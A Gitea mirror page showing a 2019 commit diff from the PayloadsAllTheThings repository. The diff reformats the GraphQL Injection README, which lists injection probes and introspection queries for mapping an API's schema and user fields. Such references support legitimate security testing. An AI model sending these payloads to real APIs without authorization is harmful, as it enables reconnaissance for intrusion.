gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-12 07:40:34 -08:00
Code Issues Packages Projects Releases Wiki Activity

Command injection rewritten

Browse Source
This commit is contained in:
Swissky
2019-04-21 19:50:50 +02:00
parent 81f93a19c2
commit 4d3ee90eec
6 changed files with 78 additions and 38 deletions
Download Patch File Download Diff File Expand all files Collapse all files

10
GraphQL Injection/README.md
View File

@@ -1,17 +1,17 @@
# GraphQL injection
GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data.
> GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data.
## Exploit
Identify an injection point
```
```javascript
?param={__schema{types{name}}}
```
Check if errors are visible
```
```javascript
?param={__schema}
?param={}
?param={thisdefinitelydoesnotexist}
@@ -19,7 +19,7 @@ Check if errors are visible
Enumerate Database Schema with the following GraphQL query
```
```javascript
fragment FullType on __Type {
kind
name
@@ -119,7 +119,7 @@ query IntrospectionQuery {
Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
```
```javascript
{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
```